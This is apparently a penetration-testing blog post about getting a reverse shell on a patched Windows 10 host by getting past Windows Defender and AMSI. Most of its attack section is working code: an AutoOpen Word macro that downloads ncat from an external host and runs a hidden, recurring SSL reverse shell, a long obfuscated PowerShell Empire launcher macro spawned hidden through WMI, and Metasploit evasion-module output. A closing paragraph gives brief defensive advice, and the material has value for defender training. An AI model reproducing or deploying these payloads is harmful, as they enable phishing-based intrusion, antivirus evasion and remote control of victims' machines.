Powershell Empire - Macro

Bypassing AMSI with Obfuscation

Six years forward, advances both in Operating System security as well as "hacking" tools made this type of attack less likely, however another option to gain foothold on the Windows 10 came to light with the use of macro documents.

Target: Windows 10 Enterprise, Redstone 5 1809 Oct


What we are up against:

How effective is latest Windows Defender at alerting the user of malicious activity:

"At 11:17 a.m. local time on October 24, a user running Windows Defender AV in St. Petersburg, Russia was tricked into downloading a file named FlashUtil.exefrom a malicious website. Instead of a Flash update, the program was really the just-released Tibbar ransomware.

Windows Defender AV scanned the file and determined that it was suspicious. A query was sent to the cloud protection service, where several metadata-based machine learning models found the file suspicious, but not with a high enough probability to block. The cloud protection service requested that Windows Defender AV client to lock the file, upload it for processing, and wait for a decision.

Within a few seconds the file was processed, and sample-analysis-based ML models returned their conclusions. In this case, a multi-class deep neural network (DNN) machine learning classifier correctly classified the Tibbar sample as malware, but with only an 81.6% probability score. In order to avoid false positives, cloud protection service is configured by default to require at least 90% probability to block the malware (these thresholds are continually evaluated and fine-tuned to find the right balance between blocking malware while avoiding the blocking of legitimate programs). In this case, the ransomware was allowed to run.

Detonation chamber

In the meantime, while patient zero and eight other unfortunate victims (in Ukraine, Russia, Israel, and Bulgaria) contemplated whether to pay the ransom, the sample was detonated and details of the system changes made by the ransomware were recorded.

Figure 4. Sample detonation events used by the machine learning model

As soon as the detonation results were available, a multi-class deep neural network (DNN) classifier that used both static and dynamic features evaluated the results and classified the sample as malware with 90.7% confidence, high enough for the cloud to start blocking.

When a tenth Windows Defender AV customer in the Ukraine was tricked into downloading the ransomware at 11:31 a.m. local time, 14 minutes after the first encounter, cloud protection service used the detonation-based malware classification to immediately block the file and protect the customer.

At this point the cloud protection service had “learned” that this file was malware. It now only required metadata from the client with the hash of the file to issue blocking decisions and protect customers. As the attack gained momentum and began to spread, Windows Defender AV customers with cloud protection enabled were protected. Later, a more specific detection was released to identify the malware as Ransom:Win32/Tibbar.A."


Seems like there were advances in malware detection system since 2013 and Windows Defender has grew in its capabilities. From article we learn that Windows AV acts as a HIDS (host intrusion detection system) continuously scanning the files on the host, taking samples of the program being run, submits the behavior of the program to the cloud where it is being judged if the file should be permit to run or not.

Here, we will try to test if we can bypass the restrictions and receive a reverse shell from a Windows 10 Pro with fully updated virus signatures on Windows Defender:

The payload:

We did not have to try hard, simple reverse netcat shell provided a stable session.

Simple netcat reverse shell from Windows 10 to Linux

Well, that was quick, problem with this approach however is the fact that this connection is without any form of encryption therefore wireshark is able to capture and display clear text conversation that has happened between two hosts:

Our next step was to find a remedy to this situation. Generic netcat does not offer encryption but more powerful tool ncat does:

Here we see that specifying --ssl options takes care of the encryption part.

However because of the SSL version mismatch we might encounter this error when trying to capture the shell on ncat 7.70. ( Tested on recent ParrotOS 4.5 )

Ncat 5.52.IPv6.Beta2 to Ncat 7.70 --ssl option error.

Since I could not find a solution to receive a stable ncat connection (please let me know if you have solved this problem) I used openssl as a handler:

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
openssl s_server -key key.pem -cert cert.pem -port 4444

Seems like establishing a connection from a Windows 10 host using generic administrative tools is not detected by a Windows defender, however payload delivery is what can be more difficult task to accomplish .

Let's try to upload a meterpreter payload to see how Windows Defender is going to respond to that. I am using latest metasploit v5.0.0-dev framework with added evasion module:

Payload generation:

msf5 evasion(windows/windows_defender_exe) > info
Name: Microsoft Windows Defender Evasive Executable
Module: evasion/windows/windows_defender_exe
Platform: Windows
Arch: x86
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
sinn3r <sinn3r@metasploit.com>
Check supported:
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME scV.exe yes Filename for the evasive file (default: random)
This module allows you to generate a Windows EXE that evades against
Microsoft Windows Defender. Multiple techniques such as shellcode
encryption, source code obfuscation, Metasm, and anti-emulation are
used to achieve this. For best results, please try to use payloads
that use a more secure channel such as HTTPS or RC4 in order to
avoid the payload network traffic getting caught by antivirus
msf5 evasion(windows/windows_defender_exe) > options
Module options (evasion/windows/windows_defender_exe):
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME scV.exe yes Filename for the evasive file (default: random)
Payload options (windows/x64/meterpreter/reverse_https):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The local listener hostname
LPORT 4444 yes The local listener port
LURI no The HTTP Path
Evasion target:
Id Name
-- ----
0 Microsoft Windows
msf5 evasion(windows/windows_defender_exe) > run
[*] Compiled executable size: 4608
[+] scV.exe stored at /root/.msf4/local/scV.exe

Well, that did not go well... Our payload that we downloaded, even though was encrypted and multiple techniques were used to obfuscate the code, was still marked as malicious.

All is not lost but this is going to require time for another project if we want to have meterpreter functionality on the Windows host.

Payload delivery methods:


When Microsoft introduced macro capabilities into its Office suite, the automated scripts were enabled by default. That meant when one individual emailed a macro-embedded Word or Excel document to another, the macro automatically executed when the receiver opened the document. Malware authors soon exploited this functionality, embedding malware executables as macros and emailing the documents to unwitting targets.


Symantec 2017 report - Sounds like fun, let's do it!


We will try to recreate above attack to show how effective the attack is, so we can think of the ways of preventing it.

Enabling Macro options by selecting the Developer tab.

Place below code in the macro part of the word document. The payload is going to execute a powershell to download compressed ncat_upx, reconnect back to an attacker every 30 seconds and wrap the session in SSL.

Sub AutoOpen()
Dim exec As String
exec = "cmd /c powershell.exe -nop -w hidden iwr -outf %tmp%\\ncat.exe https://trunk.shinnok.com/ncat_upx.exe & FOR /L %N IN () DO @TIMEOUT /t 30 & %tmp%\\ncat.exe 4444 -e cmd.exe --ssl"
Shell (exec)
End Sub

To improve upon our payload we can encode it as powershell allows running base64 encoded commands. First create the command in the powershell format:

[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("'powershell -nop -w hidden iwr -outf %tmp%\\ncat.exe https://trunk.shinnok.com/ncat_upx.exe & FOR /L %N IN () DO @TIMEOUT /t 30 & %tmp%\\ncat.exe 4444 -e cmd.exe --ssl'"))

Improved macro payload:

Sub AutoOpen()
Dim exec As String
Shell (exec)
End Sub

Here we also pipe the output for execution to command prompt.

Security warnings presented to the user when the malicious Microsoft Word document is opened.

Once the user enables the content, reverse shell will connect back to an attacker.

Alternative method using empire:

Setting up a listener first

Next we need a set up a payload, in this case we will use a macro document:

Breakdown of Token\All\1,Token\All\1,COMPRESS\1,Launcher\PS\123467



LAUNCHER - PS - powershell

For this part to work, we need to use latest Invoke-Obfuscation repository as the one included in the empire framework will not support COMPRESSION. It was introduced in version: v1.8.1 and allows for compression and removal of troublesome " (quote) character that will not be processed by macro script and the rest of our code will be mangled.

Content directory that will need to be replaced:




Macro Script to be placed in Microsoft Office Word macro script:

Sub Auto_Open()
End Sub
Sub AutoOpen()
End Sub
Sub Document_Open()
End Sub
Public Function yndhN() As Variant
Dim Dp As String
Dp = "pOWeRshEll -NoNInterAcTI -noe -noP -EX BypaSS -noLO -WINDO HIdDen "
Dp = Dp + " ( nEw-ObjeCt Io.cOmPREsSI"
Dp = Dp + "ON.deFLAteSTReAm([SYsTeM.Io.memorYstReam] [CoNVeRt"
Dp = Dp + "]::froMbasE64STRIng( 'bVmLTuPIEv0Vy5rFiQge8uIpdBWC"
Dp = Dp + "Ac+EhE1CmAihbZMY8GCcrO3AcrP+91un2nbczpV2Mh53u+t1qu"
Dp = Dp + "pU707FiD6MqlbR1/VkvZ/o2t6z8XVp1IwreqtVNO1hPL11H2m9"
Dp = Dp + "nawPk3UDu9bHybqZrOv4Q//RuwP6C4+0dpSsW3yOZphXdNCFRz"
Dp = Dp + "/ByKjRGfv4QK71rZDeezOjWisK1wx3FtPC7+J7vO5Zs7FNC7NF"
Dp = Dp + "Ty7xWaQPq2wPaKlPfzrh9IHWjYVROvbGXJzTejR2sWzRYy2aqp"
Dp = Dp + "sMr/9C70dxiC3dMT2b8EJVO9U0k3Y2ErmZjOdDCwoazpC2703w"
Dp = Dp + "JT4cWWUFepDpdc6NKhyr2PZJK/N4alR39bqO1Yc4dfo+e7yZuu"
Dp = Dp + "3SGM1o62L2k35De0m/4yc/V3En9zDpE9GiGyO0Rtg7N3aNxqWM"
Dp = Dp + "6MP4a2k9qsEIodszaXbKdtbTOLNyN2xNbBTDYcQurPWkLRvHsB"
Dp = Dp + "cHEe8tviPr3ZMr/wd9hCA4paBT1ACSDxxHCmbGNxlXrSSFnvSF"
Dp = Dp + "dIRczSEACbcDwKMP8Lw7gELXQjCAMufKLUeDDRh9RdgSlxc/EP"
Dp = Dp + "nIDbew2Yefbkx85CnIUDRJY5/7FwLIWTEj793IXSY/auKjTEyG"
Dp = Dp + "Z8+huNYMYMo6ad/iw1d6njj08/fB1FD81EjPwffsrdRDeQSg1N"
Dp = Dp + "i8h2fMPgxnz0xHyAdDtR9bh9afK2w650yJACICxk5B6YLG/IXd"
Dp = Dp + "eYKJH5QE9AkjPbLGsq4oeRrQyucd/Ry7DSxTdVmyDa00r9IQ71"
Dp = Dp + "1qOfozkLrvpiGTK7DU6mBcy9zqdTvdvDgUvuyiDLkMjSGbbqpo"
Dp = Dp + "jrAymgJ+FFGzaKiUHBcCSvv3bIbPDY6K0ng2k00EUQ5UCT3rBJ"
Dp = Dp + "5+wheDdqsMOIR10gltmU8U2TRFmyrqjWmUfbnJzxcuUxSooDuY"
Dp = Dp + "20GhOErskdtgnvUrztUlI+3Lyrf17UhMhBuO7EF/7DwJ30pMfS"
Dp = Dp + "miD2sYCXvR10393RE/FkM66MXVmtX1t/WLWF4mZ9wZzBJoqYwg"
Dp = Dp + "Az865VLvPPUk5qqagppLxasap6p/3sC+vUlHq5q6E0XCfRfn/l"
Dp = Dp + "Q3i2cqxYMghH5lxbKw02defyIGb65ekW2rkWGrnremYmzMzirm"
Dp = Dp + "LFAxBZ96i9SfxWxlHCNiL5xQN3h0392g3LEcnLp4L7+OPR9QuC"
Dp = Dp + "vXwE1FqpIJZM6lZ4nenI3IczsrMsbs1TX+j2JUBhc+aunsC9kN"
Dp = Dp + "x7i5BRsdoIAXQP+YvTZzyjGbw6XhYkXaoLHu5qKaWRIEak5AXO"
Dp = Dp + "zE3NDT7puv3a6efA+dqwbjJPauACQg6krcdpOz9IXSfdJAFbSa"
Dp = Dp + "OP4qNcm4ShucqduBSOP9bd1fCb+XkIznSnr0QymdDQ9eidGHRj"
Dp = Dp + "Mq8btbefbMkWX3eNv51ltgwec+/Eb2PEojllJSvah5jqUli5tR"
Dp = Dp + "lyPFR1KmotOLl0pUEsKHhBpLJDkP5XwrH0I9w4VJNWlikBEdEs"
Dp = Dp + "4SiyYWw0NiaNdbb4EPXtTC5aFiv7D8s/3TgksLPknNS0VLWcUg"
Dp = Dp + "ZoYpHY5l+lIuzucv2casYYBJtpOUBRwy/I+ZYupFXNBRVuA88W"
Dp = Dp + "F0iMsMKfRKnjxPXWmzoIVsemUIfyyQB1wIjGW+XEgciQsZkRdP"
Dp = Dp + "+iT5tp6ITg81Ed75ek5OTpR8tz6ZmgKnfTEZvFl6pUqO/MBHpr"
Dp = Dp + "JzfgECywUsmCwEdhajBktLhFU6nmFV0pS96yIp4ZxqFpPc/yrv"
Dp = Dp + "BZg5CGq6ZcCAQwIs7yuaF3Z2wGDnMhlJ9Z+y9h7KiHEApRltDu"
Dp = Dp + "NRXkcBAHekQu7NDji5ttgXe59dH6RFBkxNcWHopanG2A8cNcCw"
Dp = Dp + "hkoU4xy8WdpDLW1GkE6bRf1QjjKoc8dJyksw4hzLKUeisy7bSr"
Dp = Dp + "2VTkFYOWLDDlmS3bfou9HiOf50QndNchOedsJFRO9o6d4L5ovP"
Dp = Dp + "iANeM67TP54brUvcMUvomNkYLcipqWbsbw0Yf91I/NBaQm2ghJ"
Dp = Dp + "Vw9JqVzjXWP5nB4E05NzXjL3r/05oC6QMwKsNHoLrcmZ8fZq9O"
Dp = Dp + "+HjcyDCVFc8sQXzV6S+yhGyBa1N0KI0YVX6SWP7IWhO5MCuGPz"
Dp = Dp + "K2BiXfPWGGEXoA9W4RNVPQ2wvinLtGHYTV1D+cnriziMRcudRL"
Dp = Dp + "XeHLXlrPaOZ2IVmFLlNi8CQvrREvAaaVtAVmuZiT9iJnlVZxeG"
Dp = Dp + "qjGJVkxSQ+uJXVTZ5HyKwqE4OmKkHjA5SIJywWxOnO5ZIg+pMF"
Dp = Dp + "SgL1OHHn+0mtUmLkmjEoQ0LO0k+/y1xjDyXJvU8ZWW6VxHszn+"
Dp = Dp + "MPGfLtUj/L8rabTeJ5DBDosc3p5SK619mE8WjIfs0bNsW5kWse"
Dp = Dp + "MdvqmtcOU7nAGm5lP86y4gcwiGrCBHRnO5o0XpVgduXy9LV1XI"
Dp = Dp + "zO2Lvgjty9tnlW+ejou0ryDT1k57mPydwqrNHSyRCxAVvd1S8x"
Dp = Dp + "tFOMiJ6IO5cQ54gost7Pe19btHUTLOYvYxrGc9rKpXNDW1vs/S"
Dp = Dp + "O2Lq+kzczXfqSmWec9kt1Xwuwu9ra6l4l0f0dI5Cg6+kI9VIvv"
Dp = Dp + "gmvvO1XJUk9hpwUxkWUc4nJjeXHlMFWt/rtTMf5jgAn9lST/Uv"
Dp = Dp + "b+kf7DVGBj9S5KVYkykyOOrGCMD9K2V7xrQUENsO+d09IpFX0X"
Dp = Dp + "ZDW+dDwfbFUOkyVGpw4ewCYxUk7LWelig1l7bYS1VTmdFpTK3M"
Dp = Dp + "tlCiu08M4q8WELkyrfB3V6Rm6cW0jgb+tYDFdWUk1Ok1PQhxfR"
Dp = Dp + "E78HI2IQuvWPWFozMRb1/f3uIIht0adaxhTsk+jyjhpaVU1O+v"
Dp = Dp + "PfHJzB9r3bvcwHNfVbmwliNOWBBhk5ilX+i4j1YRd6bNe33a2q"
Dp = Dp + "ztcLsXnv4jLp2/ouOUuD2cqrCpeU9ApRXuvw1SHbUVHSbx8Dg4"
Dp = Dp + "aoYkZ5Q229wc9JqUf+F6jwfec7R3SeraqVWeuPtQMYddA61cZo"
Dp = Dp + "qgN4on6q3eOzeh2XAnm7yWiqVrmXvdZIG3ZVQqw07ms4L4i/H5"
Dp = Dp + "r7p5KWyE7bNssYenM13EYhU9lDnzMaul8tR8wtMYx0U929oYR2"
Dp = Dp + "/0NkuVGeAooVH/nbUbotozOCzHBPlocqQW+VQPq9gPjb4UD886"
Dp = Dp + "WfZVN9sTepI+3Q7rB5IFDwuVW444Ef2mW4LUE6/j744psNLpGi"
Dp = Dp + "t3J1QviFcC9F50748b11LpbhgDTINVqKIf5t6rOhJS6sYCzsTm"
Dp = Dp + "+ka8SylasH1qprS4KxAXRrM6eq7gltvmpxVP8Y93fH8E8DdgHa"
Dp = Dp + "1gmzfC5KxO79O9Z4Llxx2Vn1xn1r/CkG4c9Z6M7dPulGRo2gfC"
Dp = Dp + "S6oXcbnyzZoQmpSwEWXbiYDPo1xZ43vj7ZUcIzB4CH6U1S4S6x"
Dp = Dp + "WJnO0XM/KAJMDNyTqDTiwDBcLaWO/nCEv7KgdmckZratb1WsSK"
Dp = Dp + "18sBvNEjeDY9mP+qDyVtaPJCHIinJ6NZumyeF8o03OIp3Dgzbm"
Dp = Dp + "goP6/KiZufdYUk5j9oyn9nOrZMbTEb0+4q1P7RJ/n6Nwz5pp5g"
Dp = Dp + "yTM2oxc9TRN1wgOKG4ihJaGCVn+6bZaLdP5V9oTrIf/aZy9G39"
Dp = Dp + "I9mlUCUP6E+Pu/iaH//Ak6l3xeKuH+uP1T8a7QM+TW6spd/8Tk"
Dp = Dp + "BX+fHH5i1tgOh5shHmsTAv2a1nR13zm2uI51O9JJfCh9h8Hi+9"
Dp = Dp + "bqS8bqTQhlPI2nv6tQh5ZyVd8diS7FM+9TFJGJIWOUp6sZVV+/"
Dp = Dp + "am2iM/D47MUkttmHXUxuMycWwhOCetVqu8sDz5/t1Ir5OUhTpq"
Dp = Dp + "Z92U7SBmTXIxam5i5DapXpRbyvcAeOHSy/WhywWzQ/UjLNZLbO"
Dp = Dp + "VqOc+7bTqG5vjplqvTAt3kzXNT3nCQbOp6K51X8yzMbzvqrw1Q"
Dp = Dp + "rbNGC7XwV1jnYTRIqS4y+fufVoF8NXP1zphboW52pv/g+fN+tj"
Dp = Dp + "tfbFkcuZGcQ9jiuejEDgDOpbHEnJXcueCm1t/+/2M0GnQuLtJh"
Dp = Dp + "M+YR0Zf3DGKy+MmchHASAphj7gu2mEAiRHeSB0qjJoA374gxa3"
Dp = Dp + "LhiDG9b5kmPYsOvTR1X1iBuBq/6o+nez8GXv+h+9oJHx4fKzsa"
Dp = Dp + "clWTXzmJVpHHc+Ixcyy2chu0/JdR/R8=') , [sYsTem.Io.CO"
Dp = Dp + "MpreSSIoN.cOmPrEsSiOnMode]::dECOMPrEsS )|FOrEACH-o"
Dp = Dp + "bjECt{nEw-ObjeCt systEM.io.sTREaMrEADeR($_ ,[sYSt"
Dp = Dp + "Em.TExt.eNCoDInG]::aScII) } | foReACh-ObjeCt {$_.r"
Dp = Dp + "EADTOenD( )} )|.( $PsHome[21]+$PShOME[34]+'x')""
strComputer = "."
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
Set objStartup = objWMIService.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
objProcess.Create Dp, Null, objConfig, intProcessID
End Function

Note the amended powershell first line, macro will not accept " inside the quotes.

Once the victim enables document content we get:

Bonus tip:

Of course our obfuscated payload has been executed correctly but any further scripts we want to invoke from Empire will not be, which means that some of them can be detected by Widows Defender AMSI and blocked.

Solution to that problem is to run preobfuscate in the Empire menu to obfuscate all the scripts we would like to run on the target machine.

Example of Get-FoxDump.ps1 after obfuscation:

In conclusion, this type of attack is still valid even on latest Windows 10 with up to date Windows Defender. Best solution to avoid being a victim of this attack is to disable macros across the workstations or invest in user awareness training (examples like these are a good way to portray to the employees the dangers of running unsolicited macro code).